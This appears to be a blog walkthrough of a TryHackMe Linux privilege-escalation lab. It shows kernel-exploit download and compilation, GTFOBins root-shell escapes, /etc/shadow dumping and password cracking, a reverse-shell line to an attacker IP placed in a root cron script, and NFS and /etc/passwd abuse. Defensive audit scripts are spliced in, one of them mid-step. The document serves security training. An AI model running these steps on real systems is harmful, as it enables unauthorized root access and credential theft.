TryHackMe: Linux Privilege Escalation — Walkthrough

November 25, 2024 Jasper


Welcome to this walkthrough of the Linux Privilege Escalation room on TryHackMe, a Medium level room in which we get to practice privilege escalation skills on Linux machines. This is an essential skill for pentesters, and a must for everyone working within cyber security. Let’s get going. But strap in, it’s a long one!

Linux Privilege Escalation

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Box URL: https://tryhackme.com/r/room/linprivesc


1. Introduction

Privilege escalation is a journey. There are no silver bullets, and much depends on the specific configuration of the target system. The kernel version, installed applications, supported programming languages, other users’ passwords are a few key elements that will affect your road to the root shell.

This room was designed to cover the main privilege escalation vectors and give you a better understanding of the process. This new skill will be an essential part of your arsenal whether you are participating in CTFs, taking certification exams, or working as a penetration tester.

Answer: No answer needed


2. What is Privilege Escalation?

No questions here, so just read the text on THM and move on.

Answer: No answer needed


3. Enumeration

What is the hostname of the target system?

It is time to start hacking :).
Start up your AttackBox or, if you prefer, connect to the target machine using OpenVPN with the following command:

sudo openvpn <file_name>.ovpn

You then SSH into the target machine by using the provided credentials:

Username: karen

Password: Password1

We start out easy. To get the hostname of the target system we simply use the hostname command.

hostname
Finding the hostname

That’s a very easy command to remember isn’t it?

Answer: wade7363

What is the Linux kernel version of the target system?

Now it is time to find the Linux kernel version. The Linux kernel is the interface between the hardware and the computer processes running on Linux machines.

There are at least two different ways to find this mentioned in the room. We can either run:

uname -a

But we can also look at /proc/version, which may give us information on the kernel version and additional data such as whether a compiler (e.g. GCC) is installed.

cat /proc/version
uname -a and /proc/version both do the job

Both commands give the kernel version:

Answer: 3.13.0-24-generic

What Linux is this?

This one is easy as well. If you read the text you will know that systems can also be identified by looking at the /etc/issue file. This file usually contains some information about the operating system.

Run the following command:

cat /etc/issue
Reading /etc/issue

There you have the answer (just make sure you ignore the \n \l).

Answer: Ubuntu 14.04 LTS

What version of the Python language is installed on the system?

We’re doing great. Let’s keep up the momentum.

I don’t think this is mentioned in the text, but as someone with quite some Python development experience, I know we can simply run:

python --version
The python version

Alternatively, you can simply enter the Python interpreter by running python. This will show you the version as well.

Answer: 2.7.6

What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

Some simple googling on 3.13.0-24-generic will quickly bring you to a page mentioning CVE-2015-1328, such as:

Overlayfs Privilege Escalation
Rapid7’s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.www.rapid7.com

That’s all for now. In the near future we will have to exploit this weakness.

Answer: CVE-2015-1328


4. Automated Enumeration Tools

Answer: No answer needed


5. Privilege Escalation: Kernel Exploits

Find and use the appropriate kernel exploit to gain root privileges on the target system.

There are a lot of different ways to exploit this kernel vulnerability.

I found and tested at least two, which I will cover here.

First, I tested the exploit found here:

PoC/CVE-2015-1328/CVE-2015-1328.c at master · DarkenCode/PoC
PoC collection. Contribute to DarkenCode/PoC development by creating an account on GitHub.github.com

Using this exploit consists of different steps:

1. Downloading the .c file from GitHub

You can simply run:

wget https://raw.githubusercontent.com/DarkenCode/PoC/refs/heads/master/CVE-2015-1328/CVE-2015-1328.c
Downloading the exploit

2. Setting executable permissions on the file

chmod +x CVE-2015-1328.c

3. Setting up a simple Python webserver on your machine:

python3 -m http.server
Setting up a simple web server

This starts a simple web server on port 8000.

4. Download the file to the target machine.

Now we need to download the file from your attacker machine. It is important to run these commands from the target machine. Before you fetch the file it is important to be in the /tmp directory so that you have permissions to “write” files.

cd /tmp
wget <attacker ip>:8000/CVE-2015-1328.c
Downloading from our web server

We got the file!

5. Compiling the .c code to an executable

Now we just follow the exploit instructions. Compile the .c file and run it:

gcc CVE-2015-1328.c -o exploit

6. Running the executable

./exploit

That worked. And we got root!

Running the exploit

Now we need to find the flag with a quick find command:

find / -name flag1.txt 2>/dev/null
Finding the flag

Now we can simply read the flag, which is at /home/matt/flag1.txt.

Reading the flag

Pfew. We did it!

Alternatively, the Rapid7 article linked to earlier mentions a Metasploit module which you should be able to use.

msf > use exploit/linux/local/overlayfs_priv_esc 
msf exploit(overlayfs_priv_esc) > show targets
msf exploit(overlayfs_priv_esc) > set TARGET <target-id>
msf exploit(overlayfs_priv_esc) > show options
msf exploit(overlayfs_priv_esc) > exploit

Answer: No answer needed

What is the content of the flag1.txt file?

Answer: THM-28392872729920


6. Privilege Escalation: Sudo

How many programs can the user “karen” run on the target system with sudo rights?

We can use the sudo -l command to see which commands the karen user can run with sudo rights.

sudo -l
Checking our sudo rights

We see that there are three commands she can run with sudo: find, less and nano.

Answer: 3

What is the content of the flag2.txt file?

So, we found three programs which Karen can run with sudo rights. The way to proceed now is looking at https://gtfobins.github.io/ to find ways to abuse these rights to get escalated privileges.

If we search for find, we will come to the following page:

find | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It writes data to…gtfobins.github.io

Look for Sudo to find the following:

Try entering the following command:

sudo find . -exec /bin/sh \; -quit

This gives us root access:

We got root access!

Some looking around made me find the flag at /home/ubuntu:

We found the second flag!

Answer: THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

This question is similar to the previous one. If you go back to GTFOBins you can find the following page related to nmap:

nmap | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a…gtfobins.github.io

It describes the following code:

sudo nmap --interactive
nmap> !sh

Which is the expected answer!

Answer: sudo nmap --interactive

What is the hash of frank’s password?

If you have some basic knowledge you might know that the hashed passwords of users are found in /etc/shadow.

This requires root access to read, but you should have that from the previous tasks.

So just read the shadow file:

cat /etc/shadow
Reading the shadow file

There we have frank’s hash:

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1


7. Privilege Escalation: SUID

Which user shares the name of a great comic book writer?

If you have read the text on THM’s room, you will know that the usernames are found in the /etc/passwd file. To read this, we need root privileges.

The task describes finding SUID and SGID files by running the following command:

find / -type f -perm -04000 -ls 2>/dev/null

Note: 2>/dev/null simply ensures that no error messages are shown and avoids your terminal being flooded.

This lists all files with SUID and SGID bits set:

Checking files with SUID and SGID bits set

If we look at our dear friend GTFOBins we have to find an executable that is represented on the following page:

GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured…gtfobins.github.io

We will see that base64 is on the list.

Click on base64 on GTFOBins and you will find a quick and easy way to exploit this:

https://gtfobins.github.io/gtfobins/base64

The command is as follows:

./base64 "$LFILE" | base64 --decode

To be able to answer the question we can read the /etc/passwd file like this:

/usr/bin/base64 /etc/passwd | base64 --decode
Abusing base64 to read /etc/passwd

The answer must be gerryconway, a famous Marvel Comics writer (among other things, the co-creator of the Punisher!).

Gerry Conway – Wikipedia
Gerard Francis Conway (born September 10, 1952) is an American comic book writer, comic book editor, science fiction…en.wikipedia.org

Answer: gerryconway

What is the password of user2?

To get the password of user2, we need to read the /etc/shadow file, as done previously.

Run the previous command, but now to read the /etc/shadow file:

/usr/bin/base64 /etc/shadow | base64 --decode

We find the following hash:

$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/

Finally, we can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.

Before we can run this command we need to save the /etc/passwd file in a file called passwd.txt and the /etc/shadow file in a file called shadow.txt.

Make sure you are in /tmp and run the following commands:

/usr/bin/base64 /etc/passwd | base64 --decode > passwd.txt
/usr/bin/base64 /etc/shadow | base64 --decode > shadow.txt

Now we are ready to use unshadow, to create a file ready for john to crack. But we need to do this on our attacker machine. So I opted to manually copy the file contents in new files on the attacker machine.

Now run the following:

unshadow passwd.txt shadow.txt > passwords.txt
Unshadowing magic

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

This will start cracking the hashes:

Cracking the hashes

And there we found the password!

Answer: Password1

What is the content of the flag3.txt file?

We can now run the su command and change to user2.

Changing our user to user2

Now look for the flag:

find / -name flag3.txt 2>/dev/null
Trying to read flag 3!

I tried reading it, but I couldn’t!

I guess we need to use the old trick:

/usr/bin/base64 /home/ubuntu/flag3.txt | base64 --decode
Reading flag 3 with base64

There we go!

Answer: THM-3847834


8. Privilege Escalation: Capabilities

Complete the task described above on the target system

The command you have to run mentioned in the task is as follows:

getcap -r / 2>/dev/null

Which gives the following result:

Checking capabilities

Answer: No answer needed

How many binaries have set capabilities?

We can see in the screenshot above that there are 6 binaries with set capabilities.

Answer: 6
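The two questions above boil down to parsing getcap output and deciding which of the listed capabilities matter. The following audit script is an added example, not part of the TryHackMe room: it parses the text that getcap -r / prints (both the older "path = caps" and the newer "path caps" layouts), counts the binaries, and flags those whose permitted set includes a capability that amounts to root (cap_setuid, as on the view binary in this room). The sample listing and the RISKY_CAPS selection are constructed by me, not taken from the target machine.

```python
"""Parse `getcap -r / 2>/dev/null` output and flag file capabilities that let a
binary change its own UID or otherwise act as root.

Added audit example, not part of the TryHackMe room; the sample output below is
constructed and the RISKY_CAPS selection is an assumption of this example."""
import re

# File capabilities that are effectively root when granted to a binary any user can run.
RISKY_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
}

# A clause is "name[,name...]" followed by an operator and flag letters, e.g. "cap_setuid+ep".
CLAUSE_RE = re.compile(r"(?P<names>[a-z0-9_,]+)(?P<op>[+=-])(?P<flags>[eip]*)")


def parse_caps(text):
    """Map each capability name in a cap_to_text string to its set of flag letters (e, i, p)."""
    caps = {}
    for m in CLAUSE_RE.finditer(text):
        flags = set(m.group("flags"))
        for name in m.group("names").split(","):
            if name:
                caps[name] = flags
    return caps


def parse_getcap(output):
    """Return a list of (path, caps) from getcap output.

    Older libcap prints "path = cap_x+ep"; newer libcap prints "path cap_x=ep".
    Both layouts are accepted."""
    entries = []
    for line in output.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2:
            continue
        path, rest = parts
        if rest.startswith("="):          # old layout: strip the separator
            rest = rest[1:].strip()
        caps = parse_caps(rest)
        if caps:
            entries.append((path, caps))
    return entries


def risky_binaries(entries):
    """Return {path: [cap, ...]} for binaries whose permitted set holds a risky capability."""
    findings = {}
    for path, caps in entries:
        hits = sorted(name for name, flags in caps.items()
                      if name in RISKY_CAPS and "p" in flags)
        if hits:
            findings[path] = hits
    return findings


# Constructed sample in the shape of `getcap -r /` output (not the room's real listing).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/home/ubuntu/view = cap_setuid+ep
/opt/legacy-tool cap_dac_override=i
"""

if __name__ == "__main__":
    entries = parse_getcap(SAMPLE_GETCAP)
    print(f"{len(entries)} binaries have file capabilities")
    for path, caps in risky_binaries(entries).items():
        print(f"RISK {path}: {', '.join(caps)}")
```

Only capabilities with the permitted (p) flag are reported: a capability that is merely inheritable, like the constructed /opt/legacy-tool entry, is not granted at exec time and is not a finding on its own. Feed the script real getcap output on a host you administer to get a quick list of binaries whose capabilities should be justified or removed with setcap -r.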

What other binary can be used through its capabilities?

If we look at GTFOBins again, we can see that view is listed as an executable which can be exploited through its capabilities.

View can be exploited in many ways

view | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a…gtfobins.github.io

GTFOBins mentions the following:

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

cp $(which view) . 
sudo setcap cap_setuid+ep view

./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

We will look at this in the following question, but for now we have the answer.

Answer: view

What is the content of the flag4.txt file?

We actually don’t need to use the first two lines of the script from GTFOBins, since we have a binary in a home directory with the proper capabilities. We can just manage with:

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Notice the py3 instead of py.

This has given us root.

Reading flag numero 4!

Find the flag, and read it.

Answer: THM-9349843


9. Privilege Escalation: Cron Jobs

How many user-defined cron jobs can you see on the target system?

This one is easy if you read through the task. We simply need to read the crontab file to see the user-defined cron jobs:

cat /etc/crontab
Checking crontab

We see 4 cron jobs.

Answer: 4

What is the content of the flag5.txt file?

There are many vulnerabilities related to these cronjobs. The backup.sh job is writable by karen, but run as root, which you see by running ls -la:

Backup.sh is writable!

The test.py and antivirus.sh scripts do not exist anymore, so we could also create one of these ourselves (the antivirus script can be created in the home directory, so that the cron job finds it via its PATH; the test.py script can be created in the /tmp directory).

I decided to edit the /home/karen/backup.sh file. Start by editing the file:
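The three weaknesses described above (a root job whose script is writable by a normal user, a root job whose script no longer exists at its absolute path, and a root job that names a bare script resolved through the crontab PATH) can be checked mechanically. The script below is an added example, not from the room or from TryHackMe: it parses an /etc/crontab-style file, resolves each root job's script the way cron would, and reports scripts that are missing, not owned by root, or group/world-writable. The crontab text and the scratch directory tree it audits are constructed to mirror the room's layout; because the scratch files are owned by whoever runs the demo, that uid is passed in as the "root" uid.

```python
"""Audit a system crontab for root jobs whose script an unprivileged user could
alter or plant.  Added example, not part of the TryHackMe room; the crontab text
and the scratch filesystem in build_demo() are constructed."""
import os
import shlex
import stat
import tempfile

INTERPRETERS = {"sh", "bash", "python", "python2", "python3", "perl"}
DEFAULT_PATH = "/usr/bin:/bin"   # cron's fallback when the crontab sets no PATH


def parse_system_crontab(text):
    """Return (path_env, jobs); jobs is a list of (user, command) from an /etc/crontab-style file."""
    path_env, jobs = DEFAULT_PATH, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_env = line[len("PATH="):].strip('"')
            continue
        if "=" in line.split()[0]:          # other assignments such as SHELL= or MAILTO=
            continue
        if line.startswith("@"):            # @reboot / @daily style schedules
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)         # five time fields, user, command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return path_env, jobs


def script_of(command):
    """Pick the script a job executes: the first word, or the word after an interpreter."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return None
    if not tokens:
        return None
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        return tokens[1]
    return tokens[0]


def resolve(script, path_env):
    """Absolute path of the script as cron would find it, or None if it does not exist."""
    if os.path.isabs(script):
        return script if os.path.exists(script) else None
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, script)
        if os.path.exists(candidate):
            return candidate
    return None


def audit_crontab(text, root_uid=0):
    """Return (script, issue) findings for root jobs whose script is missing, non-root-owned or writable."""
    path_env, jobs = parse_system_crontab(text)
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        script = script_of(command)
        if script is None:
            continue
        resolved = resolve(script, path_env)
        if resolved is None:
            findings.append((script, "missing: can be planted in PATH or at the given location"))
            continue
        st = os.stat(resolved)
        if st.st_uid != root_uid:
            findings.append((script, "owned by uid %d, not root" % st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((script, "group- or world-writable"))
    return findings


def build_demo():
    """Create a scratch tree mirroring the room's layout (constructed) and audit it."""
    base = tempfile.mkdtemp()
    karen = os.path.join(base, "home", "karen")
    os.makedirs(karen)
    backup = os.path.join(karen, "backup.sh")
    with open(backup, "w") as fh:
        fh.write("#!/bin/bash\ntar czf /backups/karen.tgz /home/karen\n")
    os.chmod(backup, 0o777)                                   # writable by everyone: the room's bug
    safe = os.path.join(base, "usr", "local", "bin", "rotate-logs.sh")
    os.makedirs(os.path.dirname(safe))
    with open(safe, "w") as fh:
        fh.write("#!/bin/sh\nlogrotate /etc/logrotate.conf\n")
    os.chmod(safe, 0o755)                                     # owner-writable only
    crontab = f"""# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH={base}/usr/local/bin:{base}/home/ubuntu
17 * * * * root {safe}
* * * * * root {backup}
* * * * * root /usr/bin/python3 {base}/tmp/test.py
* * * * * root antivirus.sh
"""
    # Scratch files are owned by whoever runs this, so treat that uid as "root" for the demo.
    return audit_crontab(crontab, root_uid=os.getuid())


if __name__ == "__main__":
    for script, issue in build_demo():
        print(f"{script}: {issue}")
```

On a real host, run audit_crontab(open("/etc/crontab").read()) with the default root_uid=0; the same check applies to the files under /etc/cron.d. The fix for each finding is the one implied by the room: root-owned scripts with mode 0755 or tighter, absolute paths in every job, and no dangling entries for scripts that were removed.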

nano /home/karen/backup.sh

Enter the following, but make sure you edit the IP. I tried using the example from the article but it did not work.

#!/bin/bash
bash -i >& /dev/tcp/<attacker ip>/1234 0>&1

# Alternative:
#mkfifo /tmp/f; nc <attacker ip> 1234 < /tmp/f | /bin/bash > /tmp/f 2>&1; rm /tmp/f

I made the script look like this:

Editing the script

One last thing: you need to give the backup.sh script executable permissions by running:

chmod +x backup.sh

Then, all that is left is to start a netcat listener on your attacker machine:

nc -lvnp 1234
Setting up a listener, and receiving a connection

We got root!

But we need to find out where the flag is:

find / -name flag5.txt 2>/dev/null
Finding flag 5!

Read the flag:

Reading the fifth flag

There we go!

Answer: THM-383000283

What is Matt’s password?

We need to do the same thing as in an earlier task. Read the passwd and shadow files, copy to the attacker machine, unshadow the files, and run john on the result.

cat /etc/passwd > passwd.txt
cat /etc/shadow > shadow.txt

Now run the following:

unshadow passwd.txt shadow.txt > passwords.txt
Running unshadow once more

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Hmmm. I love the smell of cracked hashes in the morning

We found the answer!

Answer: 123456


10. Privilege Escalation: PATH

What is the odd folder you have write access for?

Let’s move on. We are getting quite close now!

To see the folders for which we have write access we can run the following command:

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

We see a lot of results, but the one that stands out to me is /home/murdoch.

Finding folders with write access

And yes, this is the answer THM expects.

Answer: /home/murdoch

Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Now, to find a vulnerability, let’s have a look at the /home/murdoch/ folder. In it we find a test executable, and a python script, which both try to call an executable called thm.

Taking a look around

We know that we have access to the /home/murdoch/ folder, and this folder should now be added to the PATH. Do so by running this command:

export PATH=/home/murdoch:$PATH

Now, all we need is to create a thm file which reads the flag. This way we can ensure that the scripts call this new executable and give us the flag.
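The attack in this task works because a directory any user can write to ends up in front of the system directories in PATH, so the bare name thm (or any other bare command name) resolves to the attacker's copy first. The script below is an added example, not from the room: it audits a PATH value for entries an unprivileged user controls (world- or group-writable, not root-owned, nonexistent, or relative) and resolves a command name the way the shell does so you can see which copy wins. The directories it audits are constructed scratch copies of the room's layout, owned by the running user, which is why that uid is passed as the "root" uid in the demo.

```python
"""Audit a PATH value for directories an unprivileged user could write to, and show
which copy of a command wins the lookup.

Added example, not part of the TryHackMe room; the scratch directories are constructed."""
import os
import stat
import tempfile


def audit_path(path_env, root_uid=0):
    """Return a list of (entry, issue) for PATH entries that allow command hijacking."""
    findings = []
    for entry in path_env.split(":"):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "relative entry resolves to the current directory"))
            continue
        if not os.path.isdir(entry):
            findings.append((entry, "does not exist; whoever can create it controls lookups"))
            continue
        st = os.stat(entry)
        if st.st_uid != root_uid:
            findings.append((entry, "owned by uid %d, not root" % st.st_uid))
        if st.st_mode & stat.S_IWOTH:
            # A sticky bit (as on /tmp) only blocks deleting others' files; new files can still be added.
            findings.append((entry, "world-writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((entry, "group-writable"))
    return findings


def first_match(command, path_env):
    """Resolve a bare command name like the shell: the first PATH entry holding an executable wins."""
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def build_demo():
    """Recreate the room's situation (constructed): a world-writable home dir in front of the system dir."""
    base = tempfile.mkdtemp()
    murdoch = os.path.join(base, "home", "murdoch")
    system = os.path.join(base, "usr", "bin")
    os.makedirs(murdoch)
    os.makedirs(system)
    os.chmod(murdoch, 0o777)
    os.chmod(system, 0o755)
    # The same command name exists in both directories; PATH order decides which one runs.
    for directory in (murdoch, system):
        tool = os.path.join(directory, "cat")
        with open(tool, "w") as fh:
            fh.write("#!/bin/sh\necho cat from %s\n" % directory)
        os.chmod(tool, 0o755)
    path_env = f"{murdoch}:{system}:"          # trailing colon is an empty (relative) entry
    # Scratch dirs are owned by the current user, so treat that uid as root for the demo.
    return audit_path(path_env, root_uid=os.getuid()), first_match("cat", path_env)


if __name__ == "__main__":
    findings, winner = build_demo()
    for entry, issue in findings:
        print(f"{entry}: {issue}")
    print("cat resolves to", winner)
```

For a real check run audit_path(os.environ["PATH"]) as the user or service account you are reviewing, and pay particular attention to scripts that are executed with elevated privileges but call commands by bare name, as the test binary and thm.py in this task do.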

The flag is located at: /home/matt/flag6.txt (use previous techniques to find it, or just look around).

Now, the thm file we create can simply include a cat command for this location:

Making the script reading the sixth flag

Now, save the file, and try to run the test or thm.py file. This will fail with a permission denied message. This is because we need to give it executable rights:

chmod 777 thm

Now run this, and read the flag!

We read flag number 6!

Answer: No answer needed.

What is the content of the flag6.txt file?

Answer: THM-736628929


11. Privilege Escalation: NFS

Now it is time to enumerate for weaknesses in Network File Shares. This is the last new theory, so let’s get it over with.

How many mountable shares can you identify on the target system?

We can start by checking whether the “no_root_squash” option is present in the NFS configuration file:

cat /etc/exports
NFS config details

And indeed, the vulnerability exists, so we can proceed following the THM room's instructions on how to exploit it.

To find the total number of mountable shares on the target system, we can run the following command from your attacker machine:

showmount -e <target ip>
Showing mounts

We see three folders.

Answer: 3

How many shares have the “no_root_squash” option enabled?

We looked at this before. All three shares have “no_root_squash” enabled.
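Both questions here come down to reading /etc/exports correctly: each line is a path followed by one or more client specifications of the form host(options), and root_squash is the exportfs default unless no_root_squash is written explicitly. The parser below is an added example, not from the room: it parses an exports file, lists the (share, host) pairs exported with no_root_squash, and produces the hardened file with that option replaced. The sample file is constructed; only /home/ubuntu/sharedfolder is a path the walkthrough mentions, the other shares are invented for the example.

```python
"""Parse /etc/exports, report shares exported with no_root_squash, and emit the
hardened file.  Added example, not part of the TryHackMe room; the sample below
is constructed."""
import re

CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")   # host, then optional "(opt,opt,...)"


def parse_exports(text):
    """Return a list of (path, [(host, [options])]) entries from /etc/exports content."""
    shares = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) == 2 else "")
        clients = []
        for token in rest.split():
            m = CLIENT_RE.match(token)
            if not m:
                continue
            host = m.group(1) or "*"                 # "(rw)" with no host applies to every client
            options = [o for o in (m.group(2) or "").split(",") if o]
            clients.append((host, options))
        shares.append((path, clients))
    return shares


def no_root_squash_shares(shares):
    """List (path, host) pairs where a remote root keeps uid 0 on the export."""
    return [(path, host) for path, clients in shares
            for host, options in clients if "no_root_squash" in options]


def harden_exports(text):
    """Rewrite the file so every no_root_squash becomes root_squash (the exportfs default)."""
    return re.sub(r"\bno_root_squash\b", "root_squash", text)


# Constructed /etc/exports; only /home/ubuntu/sharedfolder is a path from the room.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data *(rw,sync,no_root_squash,no_subtree_check)
/srv/scratch 10.0.0.0/24(rw,sync,no_root_squash)
/srv/public 10.0.0.0/24(ro,sync,root_squash) 10.0.0.5(rw,sync)
"""

if __name__ == "__main__":
    shares = parse_exports(SAMPLE_EXPORTS)
    print(f"{len(shares)} shares exported")
    for path, host in no_root_squash_shares(shares):
        print(f"no_root_squash: {path} -> {host}")
    print(harden_exports(SAMPLE_EXPORTS))
```

The check counts the client specifications, not just the lines, because one share can be exported to several hosts with different options; the last sample line is squashed for one network and default-squashed (no option given) for a single host, so it produces no finding.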

Answer: 3

Gain a root shell on the target system

Let’s keep on rolling. Create a folder in your /tmp directory for the mounting of the NFS share.

mkdir /tmp/nfs

cd /tmp/nfs

Then we can mount the drive:

mount -o rw <target ip>:/home/ubuntu/sharedfolder /tmp/nfs

Now create the script file:

nano shell.c
Creating a script

Save it. Now compile it with the following command:

gcc shell.c -o shell -w

Set the right permission:

chmod +s shell

Switch over to the target machine and run the shell executable. If your file does not show up, make sure you copied it to the folder where you mounted your share; the share synchronises with the target machine, similar to how a service like Dropbox works.

Now we got root!

We got root again

Answer: No answer needed

What is the content of the flag7.txt file?

Now that we have root, we can access the flag at /home/matt/flag7.txt:

Finding flag 7!

Answer: THM-89384012


12. Capstone Challenge

Pfew. We made it to the capstone challenge!

What is the content of the flag1.txt file?

I am going to go through the techniques learned in this room sequentially, until we find a method to use.

Unfortunately, we can’t use sudo -l.
I tried printing the passwd file to see which users are on the system:

cat /etc/passwd | cut -d ":" -f 1
Passwd entries

The shadow file is off limits though.

The history file is also not showing anything useful. Finding files that are readable, writable and executable by all users does not show anything either.

find / -type f -perm 0777 2>/dev/null

Another try, look for files with the SUID bit:

find / -perm -u=s -type f 2>/dev/null

Here we found some interesting things:

Executables with SUID bit set

Now, we could misuse the SUID bit on the base64 executable, as we did before:

How to exploit base64
base64 /etc/shadow | base64 --decode
Reading the shadow file

This allows us to do the unshadow trick again, and cracking with john:

/usr/bin/base64 /etc/passwd | base64 --decode > passwd.txt
/usr/bin/base64 /etc/shadow | base64 --decode > shadow.txt

Now we are ready to use unshadow again. Remember, we need to do this on our attacker machine. So I opted to manually copy the file contents into new files on the attacker machine. Finally, run the following:

unshadow passwd.txt shadow.txt > passwords.txt

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

This worked:

Cracking hashes again, again

Now we can change users to missy:

su missy

And type in her password.

Changing user to missy

If we search for the password we can find it now:

Finding the first flag

Read it:

Reading first flag

Answer: THM-42828719920544

What is the content of the flag2.txt file?

With that over it, we can check for more vulnerabilities. We lack root after all. Going through a similar process as before, I quickly found out something interesting while running sudo -l again:

Interesting sudo -l entries

Missy can run /usr/bin/find as root.

Where to find out how to abuse this? GTFOBins of course:

find | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It writes data to…gtfobins.github.io

As mentioned:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo find . -exec /bin/sh \; -quit

Let’s try to run this command ourselves. This caused some failures for me. Something was wrong with the “.” right after find. After some experimentation this worked for me:

sudo find -exec /bin/sh \; -quit

This gives us root:

We got root

The final flag can be found here:

Flag 2 found

Let’s read it:

Reading the second flag

Answer: THM-168824782390238

Congratulations:

WE DID IT!

BONUS:

I quickly found out that leonard also has write access to /etc/passwd:

Vulnerability in passwd file

This means we could have quickly added a new user, and hash a password with the following command:

openssl passwd 1234

If we add our username and hash in the same format as the other users, we could have quickly gained root!

Updating the passwd file

Change user to the new user:

Gaining root with our test user

Remember: there are nearly always many ways into a system!


Congratulations, we are done! I really loved this room and it really gave me a ton of new knowledge about privilege escalation. I hope you enjoyed it as much as I did! See you next time. Happy hacking!


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

HTB Academy : Cybersecurity Training
Sign up for the best cybersecurity training courses and certifications! Enjoy browser-based interactive learning for…referral.hackthebox.com
